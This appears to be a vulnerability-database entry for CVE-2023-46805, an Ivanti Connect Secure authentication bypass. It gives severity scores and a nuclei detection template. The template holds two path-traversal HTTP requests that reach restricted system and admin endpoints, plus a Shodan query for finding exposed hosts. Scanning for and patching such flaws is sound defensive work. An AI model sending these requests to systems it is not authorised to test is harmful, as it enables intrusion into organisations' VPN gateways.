nuclei / ProjectDiscovery / NUCLEI:CVE-2023-46805
History: Jan 16, 2024 - 6:36 p.m.

Ivanti ICS - Authentication Bypass

2024-01-16 18:36:55
ProjectDiscovery
github.com
Tags: ivanti, authentication bypass, web component, vulnerability, remote attacker, control checks

CVSS3: 9.1 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: HIGH
  User Interaction: NONE
  Scope: CHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

AI Score: 9 High (Confidence: High)

CVSS2: 6.4 Medium
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: NONE
  Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

EPSS: 0.973 High (Percentile: 99.9%)

An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.

id: CVE-2023-46805

info:
  name: Ivanti ICS - Authentication Bypass
  author: DhiyaneshDK,daffainfo,geeknik
  severity: high
  description: An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.
  reference:
    - https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
    - https://nvd.nist.gov/vuln/detail/CVE-2023-46805
    - http://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html
    - https://github.com/H4lo/awesome-IoT-security-article
    - https://github.com/inguardians/ivanti-VPN-issues-2024-research
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2023-46805
    cwe-id: CWE-287
    epss-score: 0.96274
    epss-percentile: 0.99497
    cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: ivanti
    product: "connect_secure"
    shodan-query: "html:\"welcome.cgi?p=logo\""
  tags: cve,cve2023,kev,auth-bypass,ivanti

http:
  - raw:
      - |
        GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /api/v1/cav/client/status/../../admin/options HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'contains(body_1, "build")'
          - 'contains(body_1, "system-information")'
          - 'contains(body_1, "software-inventory")'
          - 'contains(header_1, "application/json")'
        condition: and

      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "poll_interval")'
          - 'contains(body_2, "block_message")'
          - 'contains(header_2, "application/json")'
        condition: and
# digest: 490a0046304402200ecd050c196cc17a960bbe78b7217a1d0bbdf94d05261a528f992427117b470002206a36cafa1a82caa7f5dcaf43f9abaa55438c280dbdb67df57eaab83abc12ebc2:922c64590222798bb761d5b6d8e72950
